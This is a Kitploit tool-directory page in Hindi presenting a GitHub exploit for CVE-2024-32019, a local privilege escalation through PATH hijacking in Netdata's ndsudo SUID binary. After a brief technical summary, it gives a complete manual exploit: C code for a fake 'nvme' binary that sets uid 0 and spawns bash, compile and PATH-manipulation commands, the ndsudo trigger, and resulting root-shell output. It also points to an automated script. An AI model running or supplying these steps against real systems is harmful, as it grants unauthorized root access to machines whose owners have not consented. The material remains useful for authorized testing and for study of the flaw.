Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation — CVE-2024-32019 Netdata (संस्करण >= 1.44.0-60 < 1.45.3) में एक उच्च-गंभीरता वाली स्थानीय विशेषाधिकार वृद्धि भेद्यता है, जो ndsudo SUID बाइनरी में PATH वेरिएबल के असुरक्षित उपयोग के कारण होती है, जिससे हमलावर रूट के रूप में मनमाने कमांड निष्पादित कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषणलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation

CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

CVE-2024-32019 Netdata (संस्करण >= 1.44.0-60 < 1.45.3) में एक उच्च-गंभीरता वाली स्थानीय विशेषाधिकार वृद्धि भेद्यता है, जो ndsudo SUID बाइनरी में PATH वेरिएबल के असुरक्षित उपयोग के कारण होती है, जिससे हमलावर रूट के रूप में मनमाने कमांड निष्पादित कर सकते हैं।

रिपॉजिटरी देखेंवेबसाइट
1411 साल पहलेअभी तक समीक्षित नहीं

🚨 CVE-2024-32019 - Netdata ndsudo PATH भेद्यता शोषण (LPE से रूट)

एक Python-आधारित शोषण CVE-2024-32019 के लिए, जो Netdata Agent में एक उच्च-गंभीरता स्थानीय विशेषाधिकार वृद्धि भेद्यता है, जो एक गलत कॉन्फ़िगर किए गए SUID बाइनरी (ndsudo) का लाभ उठाता है जो PATH पर्यावरण चर को सुरक्षित रूप से संभालने में विफल रहता है।


[!Caution] यह कोड केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस उपकरण का उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।

🔍 अवलोकन

CVE ID: CVE-2024-32019
CVSS स्कोर: 8.8 (उच्च)
खुलासा: 12 अप्रैल, 2024
घटक: Netdata Agent
प्रभावित संस्करण:

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🧠 तकनीकी सारांश

Netdata का ndsudo उपकरण एक SUID रूट बाइनरी है जो गैर-रूट उपयोगकर्ताओं की ओर से सुरक्षित रूप से सिस्टम कमांड (जैसे nvme) के एक सीमित सेट को निष्पादित करने के लिए है।

हालांकि, एक कार्यान्वयन दोष के कारण, यह कमांड बाइनरी को हल करते समय उपयोगकर्ता-नियंत्रित PATH वैरिएबल का सम्मान करता है। यदि कोई हमलावर PATH में हेरफेर करके एक लिखने योग्य निर्देशिका शामिल कर सकता है जिसमें एक दुर्भावनापूर्ण बाइनरी है, तो ndsudo इसे रूट विशेषाधिकारों के साथ निष्पादित करेगा — जिसके परिणामस्वरूप स्थानीय विशेषाधिकार वृद्धि होगी।


💥 मैनुअल शोषण चरण

निम्नलिखित चरण दर्शाते हैं कि ndsudo में भेद्यता का मैन्युअल रूप से शोषण कैसे किया जाए।

1. विशेषाधिकार वृद्धि बाइनरी बनाएं

निम्नलिखित C कोड को nvme.c के रूप में सहेजें:

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

2. शोषण संकलित करें

root@kitploit:~
gcc nvme.c -o nvme

3. लक्ष्य पर शोषण वातावरण तैयार करें

root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme

4. PATH संशोधित करें

root@kitploit:~
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme

5. शोषण ट्रिगर करें

root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

यदि सफल होता है, तो आपको रूट शेल मिलेगा।

root@kitploit:~
# whoami
root

स्वचालित शोषण

यदि आपके पास SSH पहुंच है, तो आप इसे स्वचालित करने के लिए CVE-2024-32019-dbs.py का उपयोग कर सकते हैं।

Exploitation using script

📎 संदर्भ

  • GitHub सुरक्षा सलाह
  • CVSS स्कोर: 8.8 (उच्च)
  • CVE-2024-32019: Netdata भेद्यता विश्लेषण और शमन
टूल डाउनलोड करें